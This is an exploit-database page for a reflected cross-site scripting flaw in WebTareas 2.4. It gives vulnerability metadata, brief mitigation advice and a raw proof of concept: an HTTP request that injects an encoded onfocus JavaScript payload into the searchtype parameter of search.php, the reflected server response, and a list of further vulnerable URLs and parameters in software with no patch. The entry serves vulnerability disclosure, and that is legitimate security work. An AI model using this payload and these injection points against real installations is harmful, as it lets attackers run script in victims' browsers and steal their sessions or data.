WebTareas 2.4 - Reflected XSS (Unauthorised)

vendor:

WebTareas

by:

Hubert Wojciechowski

8.8

CVSS

HIGH

Reflected XSS

CWE

Product Name: WebTareas

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE:

CPE: a:webtareas:webtareas:2.4

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2022

WebTareas 2.4 – Reflected XSS (Unauthorised)

A reflected XSS vulnerability exists in WebTareas 2.4, which allows an unauthorised user to inject malicious JavaScript code into the application. The vulnerability is triggered when a maliciously crafted URL is sent to the application, which is then reflected back to the user. The malicious code is executed in the user's browser, allowing the attacker to gain access to sensitive information or perform other malicious actions.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed.

Source

Exploit-DB raw data:

# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Proof Of Concept 
-----------------------------------------------------------------------------------------------------------------------
Param: searchtype
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 07:46:31 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11147
[...]
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
[...]

-----------------------------------------------------------------------------------------------------------------------
Other vulnerable url and params:
-----------------------------------------------------------------------------------------------------------------------
/webtareas/administration/print_layout.php [doc_type]
/webtareas/general/login.php [logout]
/webtareas/general/login.php [session]
/webtareas/general/newnotifications.php [msg]
/webtareas/general/search.php [searchtype]
/webtareas/administration/print_layout.php [doc_type]